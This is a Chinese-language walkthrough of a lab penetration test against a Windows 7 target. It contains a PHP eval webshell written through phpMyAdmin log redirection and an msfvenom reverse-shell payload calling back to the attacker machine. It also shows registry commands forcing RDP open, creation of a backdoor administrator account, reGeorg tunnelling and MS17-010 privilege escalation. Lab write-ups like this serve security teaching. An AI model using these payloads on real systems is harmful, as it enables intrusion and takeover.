实验环境:
win7靶机:192.168.42.128
攻击机kali2020:192.168.42.129
0x01、信息收集
Nmap扫描开放的端口
Namp -sV 192.168.42.128
继续对80端口进行信息收集
发现了phpinfo.php文件和phpMyAdmin
访问phpinfo.php发现www根目录的位置
访问phpmyadmin,使用弱口令root,root成功进入后台
这里可以看到mysql的版本和apache服务器的一些信息
0x02、利用phpmyadmin日志文件getshell
执行SHOW VARIABLES LIKE 'secure_file_priv'查看该站点是否有写入权限
secure_file_priv的值为null,说明mysql不允许导入导出
执行 SHOW VARIABLES LIKE '%general_log%'查看日志文件的相关信息
可以看到日志为关闭状态,我们需要开启日志,并且更换日志路径
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/log.php';
执行SQL语句,写入一句话木马
SELECT '<?php @eval($_POST["obse"]);?>';
查看木马是否可用
0x03、利用Yxcms来getshell
目标机上存在已知cms
进入后台登录界面
利用phpmyadmin查看admin密码
尝试对密码进行md5解密
解密失败,看来不一定是md5加密
百度得到yxcms后台默认管理员密码123456,然后进入后台
通过前台模板插入木马文件
注意木马文件所在位置
yxcms下有protected和public两个目录,经过一番寻找,最终发现木马位置
0x04、getshell后的一些操作
用蚁剑连上shell
蚁剑的虚拟终端不是很好用,个人还是比较喜欢用msf中的会话
用msf生成exe木马,创建一个终端会话,php马也可以,不过我这里我这里不知道是什么原因,php马总是掉
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4444 -e x86/shikata_ ga_nai -i 5 -f exe > 123.exe
尝试用终端强行开启3389端口,然后使用远程桌面连接
进入shell后,为了防止乱码,再输入chcp 65001 来更改编码方式
查看3389端口是否开启
netstat -ano
可以看到3389端口未开启
强行开启3389端口
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDPTcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
命令行添加windows用户并加入administrators组
net user obse Password@007 /add
net localgroup administrators obse /add
尝试远程桌面连接
应该是设置了什么策略,所以我们没法成功连接
如果是真实的渗透,建议使用代理工具代理流量,这里随便记录一下使用reGeorg开启socks5反向代理的方法
先上传tunnel.php到与shell.php同一目录下
访问tunnel.php如果出现以下界面则说明这个脚本可用
运行reGeorgSocksProxy.py脚本
python2 reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u http://192.168.42.128/yxcms/protected/apps/default/view/default/tunnel.php
这时就可以使用代理软件了,使用proxifier进行socks5代理
打开proxifier,在配置文件中选择代理服务器
然后在配置文件中选择代理规则
这里应用程序本来是任意程序,这里只需要添加mstsc.exe(远程桌面连接程序)
最后只勾选我们需要的代理就行了
然后再进行远程桌面连接就可以了
尝试提权
既然没法远程桌面连接,那就尝试提权吧
使用bypassuac进行提权
经过一番尝试,未能提权成功
使用系统漏洞提权
复制systeminfo信息到提权辅助页面:https://bugs.hacking8.com/tiquan/
查询到以下漏洞
search漏洞编号,利用漏洞提权
ms17-010可以利用
设置好参数,然后执行脚本
成功提权到system
